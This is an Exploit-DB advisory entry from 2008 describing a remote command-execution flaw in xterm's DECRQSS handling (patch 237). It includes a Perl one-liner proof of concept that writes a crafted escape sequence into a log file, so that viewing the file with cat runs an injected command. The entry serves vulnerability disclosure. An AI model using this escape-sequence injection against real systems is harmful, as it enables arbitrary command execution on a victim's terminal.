xterm - DECRQSS Remote Command Execution

EDB-ID:

32690




Platform:

Linux

Date:

2008-12-29


source: https://www.securityfocus.com/bid/33060/info

The 'xterm' program is prone to a remote command-execution vulnerability because it fails to sufficiently validate user input.

Successfully exploiting this issue would allow an attacker to execute arbitrary commands on an affected computer in the context of the affected application.

The issue affects xterm with patch 237; other versions may also be affected.

The following example is available:

perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log
cat bla.log